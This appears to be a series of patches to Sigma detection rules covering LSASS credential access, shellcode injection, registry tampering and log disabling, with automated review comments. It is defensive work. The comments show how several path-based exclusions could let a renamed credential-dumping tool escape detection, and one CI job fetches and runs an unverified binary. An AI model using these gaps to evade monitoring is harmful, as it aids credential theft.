@@ -38,8 +38,8 @@ detection: - 'C:\Windows\System32\lsass.exe' - 'C:\WINDOWS\System32\perfmon.exe' - 'C:\WINDOWS\system32\wbem\wmiprvse.exe' - - 'C:\Windows\sysWOW64\wbem\wmiprvse.exe' - - 'C:\Program Files\Common Files\McAfee\MMSSHost\MMSSHOST.exe' + - 'C:\Windows\sysWOW64\wbem\wmiprvse.exe' + - 'C:\Program Files\Common Files\McAfee\MMSSHost\MMSSHOST.exe' # Windows Defender filter2: SourceImage|startswith: 'C:\ProgramData\Microsoft\Windows Defender\' @@ -92,6 +92,7 @@ detection: - '\MBAMInstallerService.exe' - '\WebEx\WebexHost.exe ' - '\Programs\Microsoft VS Code\Code.exe' + - '\JetBrains\Toolbox\bin\jetbrains-toolbox.exe' filter_xampp: SourceImage|endswith: '\xampp-control.exe' GrantedAccess: '0x410' diff --git a/rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml b/rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml index e984d6e97..726d944dc 100644 --- a/rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml +++ b/rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml @@ -4,7 +4,7 @@ status: experimental description: Detects process access to LSASS memory with suspicious access flags and from a suspicious folder author: Florian Roth date: 2021/11/27 -modified: 2022/07/07 +modified: 2022/09/20 references: - https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights - https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow @@ -65,6 +65,7 @@ detection: - '\MBAMInstallerService.exe' - '\WebexMTA.exe' - '\WebEx\WebexHost.exe' + - '\JetBrains\Toolbox\bin\jetbrains-toolbox.exe' GrantedAccess: '0x410' filter2: SourceImage|startswith: 'C:\Windows\Temp\' 
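Review bot: `'\JetBrains\Toolbox\bin\jetbrains-toolbox.exe'` is added to `SourceImage|endswith` lists in both LSASS-access rules, but JetBrains Toolbox lives under the user profile, so this exclusion is satisfiable by any unprivileged user who drops a credential-dumping tool at a path ending in that string (the suspicious-source rule at least still requires `GrantedAccess: '0x410'`, the rare-access rule's list shows no such constraint in the hunk). Prefer the longest stable tail you can, e.g. `'\AppData\Local\JetBrains\Toolbox\bin\jetbrains-toolbox.exe'`, and say in a comment that the path is user-writable. Separately, the context line directly above the new entry in `proc_access_win_rare_proc_access_lsass.yml` reads `'\WebEx\WebexHost.exe '` with a trailing space inside the quotes; with `|endswith` that value can never match a real image path, so the WebEx exclusion is dead — drop the space.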
@@ -84,9 +85,9 @@ detection: - '\vs_bootstrapper_' GrantedAccess: '0x1410' filter_chrome: - SourceImage|startswith: 'C:\Program Files (x86)\Google\Temp\' - SourceImage|endswith: '.tmp\GoogleUpdate.exe' - GrantedAccess: '0x410' + SourceImage|startswith: 'C:\Program Files (x86)\Google\Temp\' + SourceImage|endswith: '.tmp\GoogleUpdate.exe' + GrantedAccess: '0x410' condition: selection and not 1 of filter* fields: - User diff --git a/rules/windows/process_access/process_access_win_shellcode_inject_msf_empire.yml b/rules/windows/process_access/process_access_win_shellcode_inject_msf_empire.yml index 171a30883..b495e82c8 100644 --- a/rules/windows/process_access/process_access_win_shellcode_inject_msf_empire.yml +++ b/rules/windows/process_access/process_access_win_shellcode_inject_msf_empire.yml @@ -4,6 +4,7 @@ status: experimental description: Detects shellcode injection by Metasploit's migrate and Empire's psinject author: Bhabesh Raj date: 2022/03/11 +modified: 2022/09/21 tags: - attack.defense_evasion - attack.privilege_escalation 
@@ -13,11 +14,38 @@ logsource: product: windows detection: selection: - GrantedAccess: + GrantedAccess: - '0x147a' - '0x1f3fff' CallTrace|contains: 'UNKNOWN' - condition: selection + filter_dell_folders: + # If dell software is installed we get matches like these + # Example 1: + # SourceImage: C:\Program Files\Dell\SupportAssistAgent\bin\SupportAssistAgent.exe + # TargetImage: C:\Program Files\Dell\TechHub\Dell.TechHub.exe + # GrantedAccess: 0x1F3FFF + # Example 2: + # SourceImage: C:\Program Files (x86)\Dell\UpdateService\DCF\Dell.DCF.UA.Bradbury.API.SubAgent.exe + # TargetImage: C:\Program Files\Dell\TechHub\Dell.TechHub.exe + # GrantedAccess: 0x1F3FFF + # Example 3: + # SourceImage: C:\Program Files\Dell\TechHub\Dell.TechHub.exe + # TargetImage: C:\Program Files (x86)\Dell\UpdateService\DCF\Dell.DCF.UA.Bradbury.API.SubAgent.exe + # GrantedAccess: 0x1F3FFF + SourceImage|startswith: + - 'C:\Program Files\Dell\' + - 'C:\Program Files (x86)\Dell\' + TargetImage|startswith: + - 'C:\Program Files\Dell\' + - 'C:\Program Files (x86)\Dell\' + GrantedAccess: 0x1F3FFF + CallTrace|startswith: 'C:\Windows\System32\ntdll.dll' + filter_dell_specifc: + SourceImage: C:\Program Files (x86)\Dell\UpdateService\ServiceShell.exe + TargetImage: C:\Windows\Explorer.EXE + GrantedAccess: 0x1F3FFF + CallTrace|startswith: 'C:\Windows\System32\ntdll.dll' + condition: selection and not 1 of filter_* falsepositives: - Empire's csharp_exe payload uses 0x1f3fff for process enumeration as well level: high \ No newline at end of file diff --git a/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml b/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml index 1202cc9f2..7bc952889 100644 --- a/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml +++ b/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml 
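Review bot: In both new Dell filters `GrantedAccess: 0x1F3FFF` is unquoted, so the YAML loader reads it as the integer 2047999, whereas the selection above compares strings (`'0x147a'`, `'0x1f3fff'`) and Sysmon records the field as the text `0x1F3FFF`; depending on the backend the filter turns into a numeric comparison that never matches, the exclusion silently does nothing, and the rule keeps firing on Dell hosts. Quote it in both maps: `GrantedAccess: '0x1f3fff'` (lowercase to match the existing style). While there, `filter_dell_specifc` → `filter_dell_specific`, and the `SourceImage`/`TargetImage` values in that map are unquoted unlike the rest of the file. The combination with `CallTrace|startswith: 'C:\Windows\System32\ntdll.dll'` on top of the selection's `CallTrace|contains: 'UNKNOWN'` is a sensible narrowing; the file still lacks a trailing newline.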
@@ -25,7 +25,11 @@ detection: - 'C:\Public\' - '\AppData\Local\Temp\' - '\AppData\Roaming\Temp\' - condition: selection + filter_dell: + # Launched by Dell ServiceShell.exe + ParentImage: 'C:\Program Files (x86)\Dell\UpdateService\ServiceShell.exe' + CommandLine|contains: 'C:\ProgramData\Dell\UpdateService\Temp\' + condition: selection and not 1 of filter_* fields: - ComputerName - User diff --git a/rules/windows/process_creation/proc_creation_win_mstsc.yml b/rules/windows/process_creation/proc_creation_win_mstsc.yml index 20df29533..9278e5b04 100644 --- a/rules/windows/process_creation/proc_creation_win_mstsc.yml +++ b/rules/windows/process_creation/proc_creation_win_mstsc.yml @@ -7,7 +7,7 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc date: 2022/01/07 -modified: 2022/09/20 +modified: 2022/09/21 logsource: category: process_creation product: windows @@ -27,6 +27,7 @@ detection: - ' /p' filter_mstsc_1: ParentImage: 'C:\Windows\System32\lxss\wslhost.exe' + CommandLine|contains: 'C:\ProgramData\Microsoft\WSL\wslg.rdp' condition: all of selection_mstsc* and not 1 of filter_mstsc_* or all of selection_cmdkey* falsepositives: - Unknown diff --git a/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml b/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml index fabb0e86f..fb9250c74 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml 
@@ -27,7 +27,8 @@ fields: - CommandLine - ParentCommandLine falsepositives: - - Unknown + - During Anaconda update the 'conda.exe' process will eventually launch the command described in the detection section + - Other currently unknown cases level: high tags: - attack.discovery diff --git a/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml b/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml index c6c92af1f..6b6ec4ec7 100644 --- a/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml +++ b/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml 
@@ -4,36 +4,41 @@ status: test description: A General detection to trigger for processes removing .*\shell\open\command registry keys. Registry keys that might have been used for COM hijacking activities. author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) references: - - https://github.com/OTRF/detection-hackathon-apt29/issues/7 - - https://threathunterplaybook.com/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.html - - https://docs.microsoft.com/en-us/windows/win32/shell/launch - - https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand - - https://docs.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code + - https://github.com/OTRF/detection-hackathon-apt29/issues/7 + - https://threathunterplaybook.com/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.html + - https://docs.microsoft.com/en-us/windows/win32/shell/launch + - https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand + - https://docs.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code date: 2020/05/02 -modified: 2022/03/26 +modified: 2022/09/21 logsource: - product: windows - category: registry_delete + product: windows + category: registry_delete detection: - selection: - EventType: 'DeleteKey' - TargetObject|endswith: '\shell\open\command' - filter_svchost: - Image: 'C:\Windows\system32\svchost.exe' - filter_office: - Image|startswith: - - 'C:\Program Files\Common Files\Microsoft Shared\ClickToRun\' - - 'C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\' - Image|endswith: '\OfficeClickToRun.exe' - filter_integrator: - Image: 'C:\Program Files (x86)\Microsoft Office\root\integration\integrator.exe' - filter_dropbox: - Image|endswith: '\Dropbox.exe' - TargetObject|startswith: 'HKCR\Dropbox.' 
- condition: selection and not 1 of filter_* + selection: + EventType: 'DeleteKey' + TargetObject|endswith: '\shell\open\command' + filter_svchost: + Image: 'C:\Windows\system32\svchost.exe' + filter_office: + Image|startswith: + - 'C:\Program Files\Common Files\Microsoft Shared\ClickToRun\' + - 'C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\' + Image|endswith: '\OfficeClickToRun.exe' + filter_integrator: + Image: 'C:\Program Files (x86)\Microsoft Office\root\integration\integrator.exe' + filter_dropbox: + Image|endswith: '\Dropbox.exe' + # We don't use the HKCR anchor as it could be logged as a different variation (HKEY_CLASSES_ROOT) + TargetObject|contains: '\Dropbox.' + filter_wireshark: + Image|endswith: '\AppData\Local\Temp\Wireshark_uninstaller.exe' + # We don't use the HKCR anchor as it could be logged as a different variation (HKEY_CLASSES_ROOT) + TargetObject|contains: '\wireshark-capture-file\' + condition: selection and not 1 of filter_* falsepositives: - - Unknown + - Unknown level: medium tags: - - attack.defense_evasion - - attack.t1112 + - attack.defense_evasion + - attack.t1112 From e4e2177533693dfbe8948d72d164902187900eb1 Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Wed, 21 Sep 2022 11:56:58 +0200 Subject: [PATCH 77/96] Update file_delete_win_sysinternals_sdelete_file_deletion.yml --- .../file_delete_win_sysinternals_sdelete_file_deletion.yml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml b/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml index 03798c09f..9c04a6701 100644 --- a/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml +++ b/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml 
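Review bot: `filter_dropbox` is widened from `TargetObject|startswith: 'HKCR\Dropbox.'` to `TargetObject|contains: '\Dropbox.'`, and its only other anchor is `Image|endswith: '\Dropbox.exe'` — a name, not a location — so a renamed binary run from anywhere that deletes any `...\Dropbox.*\shell\open\command` key is now excluded from a COM-hijack cleanup rule; the previous `HKCR\` prefix at least pinned the hive. If the goal is only to tolerate the `HKEY_CLASSES_ROOT` spelling, `TargetObject|contains: '\Classes\Dropbox.'` or a two-value `|startswith` list keeps the hive anchored, and constraining `Image` to the known install directory (confirm against your telemetry) closes the rename gap. The new `filter_wireshark` keys on a binary in `\AppData\Local\Temp\`, which is user-writable too, but its `\wireshark-capture-file\` target bound keeps it narrow. Finally `falsepositives: - Unknown` is now stale — the rule encodes Dropbox and the Wireshark uninstaller, so list them.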
@@ -17,12 +17,10 @@ detection: - '.AAA' - '.ZZZ' filter_wireshark: - # This event occurs when (un)installing wireshark - TargetFilename: 'C:\Program Files\Wireshark\radius\dictionary.alcatel-lucent.aaa' + TargetFilename|endswith: '\Wireshark\radius\dictionary.alcatel-lucent.aaa' condition: selection falsepositives: - Legitime usage of SDelete - - An FP may occure if the installation directory of wireshark is changed level: medium tags: - attack.defense_evasion From e987fa6acb9e73e03c46ad905069bd276bf3c008 Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Wed, 21 Sep 2022 11:57:10 +0200 Subject: [PATCH 78/96] Update file_delete_win_sysinternals_sdelete_file_deletion.yml --- .../file_delete_win_sysinternals_sdelete_file_deletion.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml b/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml index 9c04a6701..64ea228a5 100644 --- a/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml +++ b/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml @@ -18,7 +18,7 @@ detection: - '.ZZZ' filter_wireshark: TargetFilename|endswith: '\Wireshark\radius\dictionary.alcatel-lucent.aaa' - condition: selection + condition: selection and not 1 of filter_* falsepositives: - Legitime usage of SDelete level: medium From a0c3449079acc2e2d460dc2b4af577d1a2daf749 Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Wed, 21 Sep 2022 11:59:12 +0200 Subject: [PATCH 79/96] Fix typo --- rules/windows/network_connection/net_connection_win_python.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
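Review bot: `filter_wireshark` now matches on a path suffix (`TargetFilename|endswith: '\Wireshark\radius\dictionary.alcatel-lucent.aaa'`) instead of the fixed `C:\Program Files\Wireshark\` location, and the second hunk wires it into the condition, so a deletion of a file with that suffix is excluded regardless of directory. If the intent was only to tolerate a non-default install directory, that rationale belongs in a comment, e.g. `# endswith: Wireshark may be installed outside C:\Program Files`, since the removed falsepositive entry was the only place it was recorded.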
diff --git a/rules/windows/network_connection/net_connection_win_python.yml b/rules/windows/network_connection/net_connection_win_python.yml index bc3737dcb..4d50017c2 100644 --- a/rules/windows/network_connection/net_connection_win_python.yml +++ b/rules/windows/network_connection/net_connection_win_python.yml @@ -29,7 +29,7 @@ detection: CommandLine|contains|all: - 'C:\ProgramData\Anaconda3\Scripts\jupyter-notebook-script.py' filter_local_communication: - # This coumd be caused when launching an instance of Jupyter Notebook locally for example but can also be caused by other instances of python openning sockets locally etc. So comment this out if you want to monitor for those instances + # This could be caused when launching an instance of Jupyter Notebook locally for example but can also be caused by other instances of python openning sockets locally etc. So comment this out if you want to monitor for those instances DestinationIp: 127.0.0.1 SourceIp: 127.0.0.1 condition: selection and not 1 of filter_* From d9cd98838f6ee552fe5474baec0af8c052575178 Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Wed, 21 Sep 2022 12:02:15 +0200 Subject: [PATCH 80/96] Add descriptions --- .../process_access_win_shellcode_inject_msf_empire.yml | 2 +- rules/windows/process_creation/proc_creation_win_mstsc.yml | 4 +++- 2 files changed, 4 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_access/process_access_win_shellcode_inject_msf_empire.yml b/rules/windows/process_access/process_access_win_shellcode_inject_msf_empire.yml index b495e82c8..d9d77b85b 100644 --- a/rules/windows/process_access/process_access_win_shellcode_inject_msf_empire.yml +++ b/rules/windows/process_access/process_access_win_shellcode_inject_msf_empire.yml 
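Review bot: The rewritten comment on `filter_local_communication` still contains the misspelling `openning`; since this commit is a typo fix it should also read `... other instances of python opening sockets locally ...`. The loopback filter itself is unchanged.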
@@ -48,4 +48,4 @@ detection: condition: selection and not 1 of filter_* falsepositives: - Empire's csharp_exe payload uses 0x1f3fff for process enumeration as well -level: high \ No newline at end of file +level: high diff --git a/rules/windows/process_creation/proc_creation_win_mstsc.yml b/rules/windows/process_creation/proc_creation_win_mstsc.yml index 9278e5b04..0fb8cc3ec 100644 --- a/rules/windows/process_creation/proc_creation_win_mstsc.yml +++ b/rules/windows/process_creation/proc_creation_win_mstsc.yml @@ -26,11 +26,13 @@ detection: - ' /u' - ' /p' filter_mstsc_1: + # Example: mstsc.exe /v:XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX /hvsocketserviceid:XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX /silent /wslg /plugin:WSLDVC /wslgsharedmemorypath:WSL\XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX\wslg C:\ProgramData\Microsoft\WSL\wslg.rdp ParentImage: 'C:\Windows\System32\lxss\wslhost.exe' CommandLine|contains: 'C:\ProgramData\Microsoft\WSL\wslg.rdp' condition: all of selection_mstsc* and not 1 of filter_mstsc_* or all of selection_cmdkey* falsepositives: - - Unknown + - WSL (Windows Sub System For Linux) + - Other currently unknown software level: medium tags: - attack.lateral_movement From 7dd2af08e7d48609269482794762d9ba92c8e92a Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Wed, 21 Sep 2022 12:16:15 +0200 Subject: [PATCH 81/96] Update net_connection_win_python.yml --- rules/windows/network_connection/net_connection_win_python.yml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/rules/windows/network_connection/net_connection_win_python.yml b/rules/windows/network_connection/net_connection_win_python.yml index 4d50017c2..bebc55259 100644 --- a/rules/windows/network_connection/net_connection_win_python.yml +++ b/rules/windows/network_connection/net_connection_win_python.yml 
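Review bot: The new falsepositives entry in the mstsc hunk reads `WSL (Windows Sub System For Linux)`; the product name is `WSL (Windows Subsystem for Linux)`. The `# Example:` comment on `filter_mstsc_1` is useful, but the full command line could be trimmed to the two tokens the filter actually matches (`ParentImage` wslhost.exe and `C:\ProgramData\Microsoft\WSL\wslg.rdp`) to keep the line readable.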
@@ -26,8 +26,7 @@ detection: # Related to anaconda opening an instance of Jupyter Notebook # This filter will only work with aurora agent enriched data as Sysmon EID 3 doesn't contain CommandLine nor ParentImage ParentImage: C:\ProgramData\Anaconda3\python.exe - CommandLine|contains|all: - - 'C:\ProgramData\Anaconda3\Scripts\jupyter-notebook-script.py' + CommandLine|contains: 'C:\ProgramData\Anaconda3\Scripts\jupyter-notebook-script.py' filter_local_communication: # This could be caused when launching an instance of Jupyter Notebook locally for example but can also be caused by other instances of python openning sockets locally etc. So comment this out if you want to monitor for those instances DestinationIp: 127.0.0.1 From 4a741290482e16bc0c02f45361f2bee4a920451d Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Wed, 21 Sep 2022 13:12:21 +0200 Subject: [PATCH 82/96] Fix after review --- .../image_load/image_load_side_load_antivirus.yml | 10 +++++++--- .../image_load/image_load_susp_python_image_load.yml | 7 ++++--- .../proc_creation_win_susp_codepage_lookup.yml | 8 +++++--- 3 files changed, 16 insertions(+), 9 deletions(-) diff --git a/rules/windows/image_load/image_load_side_load_antivirus.yml b/rules/windows/image_load/image_load_side_load_antivirus.yml index f2198619d..ce7c17e00 100644 --- a/rules/windows/image_load/image_load_side_load_antivirus.yml +++ b/rules/windows/image_load/image_load_side_load_antivirus.yml @@ -6,6 +6,7 @@ references: - https://hijacklibs.net/ # For list of DLLs that could be sideloaded (search for dlls mentioned here in there) author: Nasreddine Bencherchali, Wietze Beukema (project and research) date: 2022/08/17 +modified: 2022/09/21 tags: - attack.defense_evasion - attack.persistence 
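Review bot: `ParentImage: C:\ProgramData\Anaconda3\python.exe` is left as a plain scalar while the rewritten `CommandLine|contains` value next to it is single-quoted; backslashes are literal in both forms, but quoting it (`ParentImage: 'C:\ProgramData\Anaconda3\python.exe'`) keeps the filter consistent with the rest of the rule. Collapsing `contains|all` with a single list entry into `contains` is behaviour-preserving.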
@@ -19,10 +20,13 @@ detection: # Bitdefender selection_bitdefender: ImageLoaded|endswith: '\log.dll' - filter_bitdefender: + filter_log_dll_bitdefender: ImageLoaded|startswith: - 'C:\Program Files\Bitdefender Antivirus Free\' - 'C:\Program Files (x86)\Bitdefender Antivirus Free\' + filter_log_dll_other: + - ImageLoaded: 'C:\Program Files\Dell\SARemediation\plugin\log.dll' + - ImageLoaded|startswith: 'C:\Program Files\Canon\MyPrinter\' # F-Secure selection_fsecure: ImageLoaded|endswith: '\qrt.dll' @@ -40,9 +44,9 @@ detection: ImageLoaded|startswith: - 'C:\Program Files\McAfee\' - 'C:\Program Files (x86)\McAfee\' - condition: (selection_bitdefender and not filter_bitdefender) or (selection_fsecure and not filter_fsecure) or (selection_mcafee and not filter_mcafee) + condition: (selection_bitdefender and not 1 of filter_log_dll_*) or (selection_fsecure and not filter_fsecure) or (selection_mcafee and not filter_mcafee) falsepositives: - Applications that load the same dlls mentioned in the detection section. Investigate them and filter them out if a lot FPs are caused. - - Dell SARemediation pulgin folder (C:\Program Files\Dell\SARemediation\plugin\log.dll) is known to contain the 'log.dll' file. + - Dell SARemediation plugin folder (C:\Program Files\Dell\SARemediation\plugin\log.dll) is known to contain the 'log.dll' file. - The Canon MyPrinter folder 'C:\Program Files\Canon\MyPrinter\' is known to contain the 'log.dll' file level: medium diff --git a/rules/windows/image_load/image_load_susp_python_image_load.yml b/rules/windows/image_load/image_load_susp_python_image_load.yml index 8ddb710a6..9b071a802 100644 --- a/rules/windows/image_load/image_load_susp_python_image_load.yml +++ b/rules/windows/image_load/image_load_susp_python_image_load.yml 
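Review bot: In the condition hunk, the Dell and Canon entries under `falsepositives` describe cases that the new `filter_log_dll_other` now excludes, so they read as open false positives when they are already handled; rewording them to `... is known to contain 'log.dll' and is excluded by filter_log_dll_other` saves an analyst re-investigating them. In the first hunk, `filter_log_dll_other` mixes an exact `ImageLoaded` path for Dell with a whole-folder `startswith` for Canon, which excludes any `log.dll` anywhere below `C:\Program Files\Canon\MyPrinter\`; a comment stating that this breadth is intended would help.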
@@ -3,7 +3,7 @@ id: cbb56d62-4060-40f7-9466-d8aaf3123f83 description: Detects the image load of Python Core indicative of a Python script bundled with Py2Exe. status: experimental date: 2020/05/03 -modified: 2021/12/05 +modified: 2022/09/21 author: Patrick St. John, OTR (Open Threat Research) tags: - attack.defense_evasion @@ -23,10 +23,11 @@ detection: - Image|startswith: - 'C:\Program Files\' - 'C:\Program Files (x86)\' + - 'C:\ProgramData\Anaconda3\' # Comment out if you don't use Anaconda in your environment condition: selection and not filter fields: - Description falsepositives: - - Legit Py2Exe Binaries - - Known false positive caused with anaconda installation/update + - Legitimate Py2Exe Binaries + - Known false positive caused with Python Anaconda level: medium diff --git a/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml b/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml index fb9250c74..3e7830ad4 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml @@ -7,7 +7,7 @@ references: - https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/ - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/chcp date: 2022/02/21 -modified: 2022/04/21 +modified: 2022/09/21 logsource: category: process_creation product: windows 
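Review bot: The new `- 'C:\ProgramData\Anaconda3\'` entry extends a `filter` that otherwise only trusts `C:\Program Files\` and `C:\Program Files (x86)\`; `C:\ProgramData\` is writable by standard users by default, so an image prefix there is a weaker trust anchor than the two existing ones. The inline comment tells readers to remove it when Anaconda is not in use, and it should also record the trade-off, e.g. `# Anaconda installs per-machine under ProgramData, a user-writable path; comment out if unused`.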
@@ -22,13 +22,15 @@ detection: - 'chcp' - 'chcp ' - 'chcp ' - condition: selection + filter_anaconda: + # This filter will only work with aurora agent enriched data as Sysmon EID 1 and EID 4688 from event log both do not contain GrandparentCommandLine field + GrandparentCommandLine|contains: '/c C:\ProgramData\Anaconda3' + condition: selection and not 1 of filter_* fields: - CommandLine - ParentCommandLine falsepositives: - During Anaconda update the 'conda.exe' process will eventually launch the command described in the detection section - - Other currently unknown cases level: high tags: - attack.discovery From 4f6d4b7c80086967a6286deb3b066c7ab022303f Mon Sep 17 00:00:00 2001 From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Tue, 20 Sep 2022 12:15:04 +0200 Subject: [PATCH 83/96] fix: FP in testing environment --- .../registry_set/registry_set_disable_winevt_logging.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml b/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml index 462cceb32..08ad446bf 100644 --- a/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml +++ b/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml @@ -3,7 +3,7 @@ id: 2f78da12-f7c7-430b-8b19-a28f269b77a3 description: Detects tempering with the "Enabled" registry key in order to disable windows logging of a windows event channel author: frack113, Nasreddine Bencherchali date: 2022/07/04 -modified: 2022/09/19 +modified: 2022/09/20 status: experimental references: - https://twitter.com/WhichbufferArda/status/1543900539280293889 
@@ -28,6 +28,7 @@ detection: - '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-FileInfoMinifilter' - '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ASN1\' - '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Kernel-AppCompat\' + - '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Runtime\Error\' filter_empty: # This filter is related to aurora. Should be removed when fix is deployed. # TODO: Remove later Image: - '' From e5e5cdd3b344104960c165337ebe5ce632d08a1d Mon Sep 17 00:00:00 2001 From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Tue, 20 Sep 2022 14:15:18 +0200 Subject: [PATCH 84/96] workflow: update evtx-baseline to v0.7 and add a new test for the data --- .github/workflows/sigma-test.yml | 20 +++++++++++++++++++- tests/check-baseline-local.sh | 15 +++++++++++++++ 2 files changed, 34 insertions(+), 1 deletion(-) diff --git a/.github/workflows/sigma-test.yml b/.github/workflows/sigma-test.yml index f40ccf5ea..60b6cdc96 100644 --- a/.github/workflows/sigma-test.yml +++ b/.github/workflows/sigma-test.yml @@ -13,7 +13,7 @@ on: # yamllint disable-line rule:truthy - oscd env: - EVTX_BASELINE_VERSION: v0.6 + EVTX_BASELINE_VERSION: v0.7 jobs: test-sigma: 
@@ -132,3 +132,21 @@ jobs: ./evtx-sigma-checker --log-source tools/config/thor.yml --evtx-path Win2022-AD/ --rule-path rules/windows/ > findings.json - name: Show findings excluding known FPs run: ./.github/workflows/matchgrep.sh findings.json .github/workflows/known-FPs.csv + check-baseline-win2022-0-20348-azure: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + - name: Download evtx-sigma-checker + run: wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/evtx-sigma-checker + - name: Download and extract Windows 2022 0 20348 Azure baseline + run: | + wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/win2022-0-20348-azure.tgz + tar xzf win2022-0-20348.tgz + - name: Remove deprecated rules + run: 'grep -ERl "^status: deprecated" rules | xargs -r rm -v' + - name: Check for Sigma matches in baseline + run: | + chmod +x evtx-sigma-checker + ./evtx-sigma-checker --log-source tools/config/thor.yml --evtx-path win2022-0-20348-azure/ --rule-path rules/windows/ > findings.json + - name: Show findings excluding known FPs + run: ./.github/workflows/matchgrep.sh findings.json .github/workflows/known-FPs.csv diff --git a/tests/check-baseline-local.sh b/tests/check-baseline-local.sh index 3c849f52d..b3d966d36 100755 --- a/tests/check-baseline-local.sh +++ b/tests/check-baseline-local.sh 
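Review bot: The new `check-baseline-win2022-0-20348-azure` job downloads `win2022-0-20348-azure.tgz` but the next line runs `tar xzf win2022-0-20348.tgz`, so the extraction step will fail on a missing file; it should be `tar xzf win2022-0-20348-azure.tgz` to match the download and the `--evtx-path win2022-0-20348-azure/` used later in the job. Separately, the job copies the existing pattern of fetching the `evtx-sigma-checker` binary from a release URL and executing it with no checksum or signature check; since `$EVTX_BASELINE_VERSION` is a mutable tag, recording an expected digest and verifying it with `sha256sum -c` before `chmod +x` would close that gap for every baseline job.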
